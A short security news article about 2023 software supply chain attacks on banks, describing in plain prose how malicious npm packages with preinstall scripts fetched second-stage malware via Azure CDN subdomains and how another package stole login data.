In a recent article, we highlighted the rise of software supply chain attacks. These types of attacks are very serious as, often, the target isn’t the software vendor itself but their customers. By accessing the end users’ systems, they are able to steal valuable data, monitor organisations or individuals, or even extort money.
Whilst it could happen to any company, a recent open source software supply chain attack that targets the banking sector specifically was discovered. This is the first of its kind.
How did the attack work?
Earlier in 2023, attacks that targeted specific components in web assets used by banks were identified.
The attackers created fake LinkedIn profiles to contact employees at the target banks and created a specific command and control centre (C2) for each of them. The two malicious npm packages (the method used to share open source software) used for the attacks included a preinstall script used to activate the multi-stage attack chain.
The script identified the host operating system (Windows, Linux, or macOS) and downloaded the second-stage malware from a remote server. It was able to do this by using Azure’s CDN subdomain which included the name of the target bank. According to Checkmarx – the company that discovered the attack – the use of Azure’s CDN subdomains was particularly clever as it “bypassed traditional deny list methods due to Azure’s status as a legitimate service.”
A growing problem
A second, apparently unrelated attack, on a different bank used an npm package that was developed to blend into the target’s website and lay dormant until prompted. It was specifically designed to covertly intercept and withdraw login data to an actor-controlled infrastructure.
Whilst the offending npm packages have now been removed, these are unlikely to be the last attacks of this kind on banks and other types of businesses. As a result it’s crucial that companies prepare themselves to tackle these types of threats in future.